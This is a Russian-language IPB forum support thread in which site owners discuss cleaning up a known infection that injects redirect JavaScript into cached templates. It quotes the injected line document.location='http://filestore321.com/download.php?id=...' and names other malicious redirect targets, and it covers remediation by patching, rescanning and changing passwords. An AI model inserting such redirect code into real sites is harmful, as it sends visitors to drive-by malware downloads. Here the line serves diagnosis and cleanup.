Перейти к публикации
View in the app

A better way to browse. Learn more.

Дизайн и модификация Invision Community

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Яндекс обнаружил вредоносный код на форуме

Опубликовано:

Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

Поведенческий анализ

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

Написал вопрос в саппорт, ответ был следующим:

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

Рекомендованные сообщения

Опубликовано:

Скажите, если заново переустановлю форум и накачу на него бекап БД. Естественно пароли к БД и админке сменю.

Вирус уйдет? Какие мысли?

Если нет модулей и тд. Можно все удалить кроме папки uploads, config_global.php, файлов шаблона (картинок), смайлов.

И произвести обновление форума.

Если есть модули, просто в свежий дистрибутив их загрузить.

И после, снова поменять пароли.

Опубликовано:

БД использовать напрямую из MySQL или можно сделать бекап форума внутренними средствами IPB?

Как правильней с точки зрения безопастности?

Опубликовано:

Скажите, если заново переустановлю форум и накачу на него бекап БД. Естественно пароли к БД и админке сменю.

Вирус уйдет? Какие мысли?

Лечение - это комплексный подход, классическая схема которая описана на первой странице темы. Методы лечения были разработаны специалистами согласно этиологии и патогенеза вируса и клинически доказаны. Не занимайтесь самолечением ©.

По факту - "заново" переустановить форум есть смысл при установке новой версии со всеми патчами безопасностями, так как вирус сидит в кеше (если речь идет об этом вирусе) и для его удаления не обязательно переустанавливать форум.

Опубликовано:

Странно...

Установил тестово на другом сайте IPB, подключился к старой БД, скопировалось все скин, в админке видны старые приложенния и хуки(хотя на сайте их не видно). Как бы не скопировался еще и вирус...

Опубликовано:

Странно...

Установил тестово на другом сайте IPB, подключился к старой БД, скопировалось все скин, в админке видны старые приложенния и хуки(хотя на сайте их не видно).

@Valeon, что вам даст "переустановка" форума? В лечении вируса, будь то человеческом или компютерном, нужно исходить из его патогенеза. Благо этот вирус хорошо изучен (условное название "редирект на filestore321 в ipb") - известен способ заражения, его структура и производимые им действия. На основе этих факторов и был разработан метод лечения, который не просто так взят с потолка. Прислушайтесь к советам специалистов, зачем вы спрашиваете "поможет ли мне переустановка форума" и занимаетесь херней, когда есть "официальный" способ лечения с протоколом действий? Вы, простите, вообще тему читали?

Ничего вам переустановка не даст, так как с таким же успехом можно просто обновить кеш стилей и вирус сбросится из временных файлов кеша. Но это не защитит от повторного заражения через ту же самую уязвимость.

"Переустановку" делается при удаление старого форума и установка нового последней версии со всеми патчами безопасностями.

В вашем случае проводится обновление последней версии форума для устранения уязвимостей (либо установка всех патчей безопасности на существующем без обязательной переустановки). А далее все также согласно инструкции.

Опубликовано:

Ну я вообщето так и установил. )))

Вирус нашел спасибо! )))

Я думал это частный случай и мысли не было что все болееют одной болячкой. Поэтому и не обратил внимание на конретно этот вирус.

Достаточно поставить последний патч или нужно ставить все с момента установки форума?

Опубликовано:

Достаточно поставить последний патч или нужно ставить все с момента установки форума?

Все последующие после релиза вашей версии. Критическим является не только последний.

• 2 недели спустя...
Опубликовано:

Добрый день! Заражение произошло на 3.4.6, у меня проблема осложнена тем , что сильно нарушился функционал админки. Вылетает ошибка JavaScript при попытке открыть шаблон. Нельзя поменять текущий шаблон на импротированный. Я нашел шаблоны в БД, но не нашел в них вредоносного кода, кеш вроде как перестраивается, но это не помогает. Выложенным ранее скриптом scan.php понаходил вредоносный код в десятке файлов и удалил (даже в conf_global.php сидел). Обновился до 3.4.7 - вирь осталося, до 3.4.8 - вирь осталося, только поползло окно залогинивания за пределы экрана, вообще ппц теперь. Уже не знаю что делать. Сносить все файлы и подгружать старую БД?

Опубликовано:

Вам нужно выполнить действия которые описаны в инструкции. Если видите что не справляетесь с вирусом и форум сильно заражен, лучше выполнить обновление форума с полным удалением файлов старой версии или обратится к специалистам.

Опубликовано:

Вам нужно выполнить действия которые описаны в инструкции. Если видите что не справляетесь с вирусом и форум сильно заражен, лучше выполнить обновление форума с полным удалением файлов старой версии или обратится к специалистам.

Спасибо за ответ. Я, может не правильно выразился, но действия по инструкции не помогают. Эту тему я перечитал несколько раз полностью. Уже и копировал весь форум на комп для проверки айболитом, но в файлах кеша он ничего не находит в продвинутом режиме. И просматривал conf_global.php - он чист. Наверное вирус более хитрый. Ладно, буду устанавливать всё с нуля.

Опубликовано:
Наверное вирус более хитрый.
Вы хотя бы написали, как он себя проявляет.

А то "следов не вижу, только окно авторизации поплыло"

Опубликовано:

Конкретно этот вирус работу js скриптов не нарушает. Если есть проблемы с их загрузкой, тогда возможно у вас другой случай заражения и лечение требует иного подхода. Чтобы о чем-то говорить, как минимум нужно показать адрес форума, привести данные каким образом вирус себя проявляет, изучать исходный код и результат работы сканеров.

• 3 месяца спустя...
Опубликовано:

Тоже в конце августа подхватил такой вирус с переездом с места на место. Именно этот описанный в начале обнаружился только в кэше на сервере, сами шаблоны были чистые. Похоже через админку внесли изменения в includeJS, перекэшировали и удалили их из админки. Видно через уязвимости угнали пароли админов, т.к. после того как удалил код и поставил все заплатки, которые вывесили на 3.4.6, на следующий же день увидел неудачную попытку залогиниться в админке с IP из Техаса.

Спустя почти месяц яндекс в итоге снял пометку с сайта, о том что на нём вредоносный код.Но тут внял жалобам пользователей и проверил через айфон, работает ли вход, что самое интересное, если входил через вай-фай, то всё работало отлично, но как только заходил через мобильный инет, то тутже работала переадресация на shockwavepub.ru, а оттуда еще на несколько сайтов. Начал смотреть стиль IP.mobile, обнаружился незашифрованный скрипт со ссылкой на этот ресурс в глобальном шаблоне стиля.

Вроде вздохнул спокойно, но начал копаться дальше, еще вписан где-то код с переадрессацией на эплстор (https://admin.appnext.com/ClickUrl.html?id=2f50022d-9f04-4fae-b59a-9175e731d3a2&pbk=wNGLJOFEDTRD3AFNGBFJL0EC&subid=b59c4a85-ee07-41d1-b5ed-89b8c8a46e25), но он проявляется только при попытке зарегистрироваться или в свободном разделе, когда пытаешься оставить сообщение как гость, т.е. переадресация случается в том месте где появляется sweetcaptcha. Вот только не могу найти где именно лежит либо форма регистрации (ответа), либо файл капчи, чтобы поискать код. Айболит чего-то мне не помог и не нашёл эту закладку.

Опубликовано:

Если редирект в шаблоне, скачайте файлы шаблона (регистрации и пр) и просмотреть их вручную - либо поиском по соответствующем функциям.

Создайте аккаунт или войдите в него для комментирования

Сейчас на странице 0

• Нет пользователей, просматривающих эту страницу.

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.